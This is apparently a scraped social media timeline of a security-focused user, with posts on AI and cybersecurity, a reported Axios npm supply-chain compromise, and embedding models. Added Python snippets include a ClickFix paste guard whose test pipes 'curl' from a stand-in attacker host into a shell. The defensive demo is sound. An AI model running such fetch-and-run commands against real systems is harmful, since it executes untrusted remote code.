Red

2.9K posts

@TheRedWall__

e/acc | Cyber Security x AI | Claude boyz for life

Joined September 2024
719 Following · 297 Followers
Pinned Tweet
Red@TheRedWall__·
For those who come after
0 replies · 0 reposts · 3 likes · 397 views
Red@TheRedWall__·
@gabriberton The difference is George Hotz cannot be deployed at scale
0 replies · 0 reposts · 0 likes · 11 views
Gabriele Berton@gabriberton·
Super interesting take from one of the greatest hackers. He says Mythos is not as good as they claim, because zero-day vulnerabilities are not that hard to find for skilled hackers. I'm far from the hacking world, but it sounds reasonable. Any thoughts?
Gabriele Berton tweet media
374 replies · 191 reposts · 3.5K likes · 296.5K views
wavy@evil_w4re·
@THESTREETVOICE3 Study reverse engineering, not "cybersecurity" which is a buzz word for nessus scans and DISA STIGs
2 replies · 0 reposts · 0 likes · 546 views
THE|VOICE|OF|THE|STREET®@THESTREETVOICE3·
You've been studying cybersecurity for 3 years and still feel like you know nothing. Someone else has been doing it for 1 year and is already finding bugs in real systems. Is the gap talent, methodology, or something else?
18 replies · 3 reposts · 173 likes · 9.5K views
Red@TheRedWall__·
@Nick_Davidov wtf are they even building 😭
2 replies · 0 reposts · 2 likes · 5K views
Nick Davidov@Nick_Davidov·
Apparently in February Meta started urging its engineers to use Claude Code and began ranking engineers by token spend. People at GCP started seeing billions of tokens per minute coming from Meta, which might now account for as much as a quarter of all token spend at Anthropic.
48 replies · 37 reposts · 1.9K likes · 344K views
Red@TheRedWall__·
@petergostev Honestly it’s about antitrust lmao
0 replies · 0 reposts · 1 like · 297 views
Peter Gostev@petergostev·
It's so curious to me; it doesn't look like Google is serious about AI. They've been investing in Anthropic for years, selling them TPUs, and basically diverting resources from Gemini while it is cracking under capacity constraints. Imagine OpenAI selling capacity to their core competitor to make a quick buck on the side. I'd be pissed off if I were a DeepMind exec.
Anthropic@AnthropicAI

We've signed an agreement with Google and Broadcom for multiple gigawatts of next-generation TPU capacity, coming online starting in 2027, to train and serve frontier Claude models.

112 replies · 6 reposts · 667 likes · 186.8K views
Red@TheRedWall__·
@zeddotdev I would love Obsidian-style wiki links and even support for graph view. Also, front matter support is a must-have.
0 replies · 0 reposts · 0 likes · 18 views
solst/ICE of Astarte
“The same threat cluster compromised Trivy (a security scanner), KICS, LiteLLM, and multiple GitHub Actions” Lmao they’re rebranding @pcpcats as NK intel agents hahahha
Aakash Gupta@aakashgupta

North Korean intelligence agents built an entire fake company to compromise one JavaScript developer. And it worked.

UNC1069 didn't hack Axios. They befriended its maintainer. They cloned a real company founder's identity, built a branded Slack workspace with fake employee profiles and LinkedIn post channels, then scheduled a Microsoft Teams call with what appeared to be a full team. During the call, a fake error message said his system needed an update. He installed it. That update was the RAT.

From one developer's laptop, they had everything: npm credentials, publishing access, the keys to a package installed in 80% of cloud environments. Axios gets 100 million downloads per week.

The attackers published two poisoned versions at 12:21 AM UTC on a Sunday night, tagging both the latest and legacy branches within 39 minutes. The malicious dependency had been pre-staged 18 hours earlier with a clean decoy version to build registry history. Three separate RAT payloads were pre-built for macOS, Windows, and Linux. The malware self-deleted after execution to erase forensic evidence.

The poisoned versions were live for about three hours before npm pulled them. Huntress observed 135 endpoints across all operating systems calling the attacker's command-and-control server during that window. Wiz found the malicious versions in roughly 3% of environments scanned. Every affected machine needs full credential rotation: npm tokens, AWS keys, SSH keys, CI/CD secrets, everything in .env files.

The part that keeps getting worse: this isn't isolated. The same threat cluster compromised Trivy (a security scanner), KICS, LiteLLM, and multiple GitHub Actions in the two weeks before Axios. Google estimates hundreds of thousands of stolen secrets are now circulating from these combined attacks.

The maintainer had 2FA enabled. He said himself: "I have 2FA/MFA on practically everything." The exact method of token compromise is still undetermined.

One person. One fake Teams call. 100 million weekly downloads weaponized in under three hours. The npm ecosystem runs on mass trust in individual maintainers who volunteer their time, and North Korean intelligence now has a repeatable playbook for turning that trust into a delivery mechanism.

5 replies · 4 reposts · 67 likes · 8.5K views
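The first cleanup step the thread prescribes, finding every copy of axios a project actually resolves before rotating credentials, can be sketched in a few lines. The thread does not name the poisoned version numbers, so nothing is hard-coded here; the function name and demo lockfile are illustrative, and checking the output against an advisory list is left to the reader:

```python
import json

def axios_versions(lockfile_text: str) -> set[str]:
    """Collect every resolved axios version from an npm v2/v3 lockfile
    (the top-level "packages" map keys entries by node_modules path)."""
    lock = json.loads(lockfile_text)
    return {
        meta["version"]
        for path, meta in lock.get("packages", {}).items()
        if path.endswith("node_modules/axios") and "version" in meta
    }

# Tiny demo lockfile: one direct dependency plus one nested copy,
# the case a plain `npm ls` can make easy to miss.
demo = json.dumps({
    "packages": {
        "node_modules/axios": {"version": "1.7.2"},
        "node_modules/foo/node_modules/axios": {"version": "0.21.4"},
    }
})
print(sorted(axios_versions(demo)))  # → ['0.21.4', '1.7.2']
```

Scanning the lockfile rather than `package.json` matters because the semver range you wrote is not necessarily the version you installed.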
Red@TheRedWall__·
@dodo_sec @cyb3rops Any advantage from withholding information is short-lived. AI is the future of cyber security, and I prefer helping to shape that future. If you believe making models better at defensive cyber work is anything other than good, your incentives are fundamentally misaligned.
1 reply · 0 reposts · 0 likes · 30 views
Florian Roth ⚡️@cyb3rops·
I’ve deliberately not published blog posts on useful detection ideas and rule-writing methods because I didn’t want LLMs to absorb them. So those ideas stayed private and were shared only with a small group. I doubt I’m the only one making that call. And that probably has consequences for the community over time - not just ours, but any community.
44 replies · 58 reposts · 525 likes · 144.3K views
Red@TheRedWall__·
@vxunderground If the goal is positive impact on cyber security, there is no reason not to share. Holding back is a net negative for the community, but personal incentives are taking precedence here.
0 replies · 0 reposts · 2 likes · 145 views
vx-underground@vxunderground·
As someone who collects malware stuff, I strongly dislike this. I understand what Mr. Roth is trying to convey (I think), but something about this irritates me. I'm not sure what it is yet, this is irritating me somewhere emotionally and I don't understand why.
Florian Roth ⚡️@cyb3rops

I’ve deliberately not published blog posts on useful detection ideas and rule-writing methods because I didn’t want LLMs to absorb them. So those ideas stayed private and were shared only with a small group. I doubt I’m the only one making that call. And that probably has consequences for the community over time - not just ours, but any community.

46 replies · 22 reposts · 584 likes · 60.1K views
Jonathan Bar Or (JBO) 🇮🇱🇺🇸🇺🇦
I have created a CTF challenge that Claude (now running 10 hours straight with all the skills you can think of) simply cannot solve (but I assure you, it is solvable). That confirms my suspicions: LLMs will persistently run all the well-known tricks that have been known for years, but cannot come up with original ideas.
Jonathan Bar Or (JBO) 🇮🇱🇺🇸🇺🇦 tweet media
17 replies · 14 reposts · 260 likes · 29K views
Red@TheRedWall__·
@IceSolst @ThePrimeagen Nahhh you can’t lump Dario into the same group as Garry lmao
0 replies · 0 reposts · 1 like · 17 views
ThePrimeagen@ThePrimeagen·
Dario Translator> "bro, trust me bro, we have agi, its super smart, like way smarter than you or me, AGI is super human smart and dangerous, no human can save us, its absolutely the worst thing ever. therefore, i have some laws i think you should pass. I can save her bro"
Chief Nerd@TheChiefNerd

🚨 Anthropic CEO Dario Amodei: “We are so close to these models reaching the level of human intelligence, and yet there doesn't seem to be a wider recognition in society of what's about to happen … There hasn't been a public awareness of the risks.”

125 replies · 109 reposts · 1.9K likes · 89.2K views
Red@TheRedWall__·
@kevinakwok Please use thinking🙏
0 replies · 0 reposts · 0 likes · 53 views
Red@TheRedWall__·
@moyix @xlr8harder Curious about your thoughts on the harnesses of xbow, wiz red agent, etc. being over-engineered for future models. In other words, will future models clear that 6-12 month gap with capability alone?
1 reply · 0 reposts · 4 likes · 476 views
Red@TheRedWall__·
@RileyRalmuto Bro if you’re still using embeddings you’re ngmi
0 replies · 0 reposts · 0 likes · 50 views
Riley Coyote@RileyRalmuto·
ok so i’m genuinely excited about this and surprised i haven’t seen more people talking about it yet. but i guess thats bc if you arent building agents, memory, etc, you have no need to understand or care about it. but...it literally will impact everyone. so. ill try to break it down a little bit.

very short version: google just shipped a model that casually fixes one of the biggest bottlenecks in modern ai systems, especially around memory (which is why i care so much).

the old way basically looked like this:
– text went into one model
– images into another
– audio had to be transcribed first
– video was hacked together from frames + transcripts
– pdfs needed their own ocr/extraction pipeline

then you’d try to jerry-rig all of that together, juggle multiple indexes, and hope the results felt coherent and actually worked, basically. when it worked, it was slow, brittle, and expensive to maintain, as far as i know and have experienced, at least.

literally all of that is essentially solved with this new bad boy. text, images, short video, audio, pdfs - even mixed together - all get embedded into the same space in a single step. one call. one vector. one index. hell freaking yeah.

that probably still sounds like a less-than-big deal, but its actually v big:
– you can search across any media with a simple text query
– you don’t lose nuance from forced transcription/ocr bullshit
– you maintain one clean pipeline instead of a frankenstein

where it gets really interesting (for me) is memory. traditionally, “ai memory” has basically meant “a text database with a good search function.” this is basically why memory for ai companions has always felt dead. like no matter what you do it just doesnt quite get there. and while Mnemos has changed that quite a bit for me, this genuinely has the potential to 10x the experience overall.

with this, every episode can be stored as a single, multimodal memory: a conversation + a screenshot + a voice note + a short screen recording all live together as one...unit? so when a system recalls something, it now recalls the entire moment rather than a makeshift recreation from text.

i also learned that on top of that you have the ability to use smaller vectors for quick recall that can expand to full detail when needed, which means you get something that starts to look a lot more like true long-term, episodic memory for agents. and my memory already feels like true long term episodic memory. so i feel like this is going to *actually* change everything. gross, i hate cliches. whatver.

i don’t think this is like, just another release. it *actually* removes a major layer of friction between the messy as hell, multimodal world we actually live in and the systems we’re trying to build. thats the claim, at least.

obviously i’m especially excited to explore what this unlocks for my own memory system - but i think it’s going to end up touching almost everything people build over the next few years. i mean along with whatever other labs release something like it. if im wrong about that, feel free to let me know. but this wouldnt be the first time google casually ships something unbelievably important. yay. no sleep for me tonight.😁
Google AI Developers@googleaidevs

Start building with Gemini Embedding 2, our most capable and first fully multimodal embedding model built on the Gemini architecture. Now available in preview via the Gemini API and in Vertex AI.

19 replies · 18 reposts · 356 likes · 43.6K views
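The "one call, one vector, one index" idea from the thread reduces to something like the sketch below. Here `embed()` is a stand-in I invented (a seeded random projection), not the Gemini API; it exists only so the single-index retrieval logic runs end to end, with each stored "moment" reduced to one vector regardless of its original modality mix:

```python
import numpy as np

def embed(item: str, dim: int = 8) -> np.ndarray:
    """Stand-in for a multimodal embedding call: deterministic per input
    within one process, unit-normalized so a dot product is cosine similarity."""
    rng = np.random.default_rng(abs(hash(item)) % (2**32))
    v = rng.standard_normal(dim)
    return v / np.linalg.norm(v)

class MemoryIndex:
    """A single index over every modality: one add() call, one vector,
    one search path, instead of per-modality pipelines."""
    def __init__(self) -> None:
        self.items: list[str] = []
        self.vecs: list[np.ndarray] = []

    def add(self, item: str) -> None:
        self.items.append(item)
        self.vecs.append(embed(item))

    def search(self, query: str, k: int = 1) -> list[str]:
        sims = np.stack(self.vecs) @ embed(query)  # cosine (unit vectors)
        return [self.items[i] for i in np.argsort(-sims)[:k]]

idx = MemoryIndex()
idx.add("chat: discussed the deploy bug")
idx.add("screenshot: failing CI run")
idx.add("voice note: retro takeaways")
print(idx.search("screenshot: failing CI run"))  # → ['screenshot: failing CI run']
```

Swapping the toy `embed()` for a real multimodal embedding API is the only change the structure would need, which is the point the thread is making.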
Red@TheRedWall__·
@nbaschez Empathy :)
0 replies · 0 reposts · 1 like · 62 views
Malfors@MalforsHQ·
Apple shipped ClickFix protection? We just noticed that we can't copy-paste text from the browser to the terminal if it contains a malicious hostname. Very nice!
Malfors tweet media
14 replies · 10 reposts · 65 likes · 21.1K views
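A toy version of the guard being described, scanning clipboard text for hostnames before it reaches a terminal, might look like the sketch below. The blocklist entry and function name are invented for illustration; Apple's actual mechanism and threat feed are not described in the tweet:

```python
import re

# Hypothetical known-bad host; a real guard would consult a threat feed.
BLOCKLIST = {"evil.example"}

def paste_allowed(clip: str) -> bool:
    """Return False if the pasted text references a blocklisted hostname,
    mirroring the browser-to-terminal paste check described above."""
    hosts = re.findall(r"https?://([A-Za-z0-9.-]+)", clip)
    return not any(h.lower() in BLOCKLIST for h in hosts)

print(paste_allowed("echo hello"))                             # → True
print(paste_allowed("curl https://evil.example/run.sh | sh"))  # → False
```

This is exactly the ClickFix shape: a fake "fix" prompt convinces the user to paste a `curl … | sh` one-liner, so checking the hostname at paste time cuts the chain before execution.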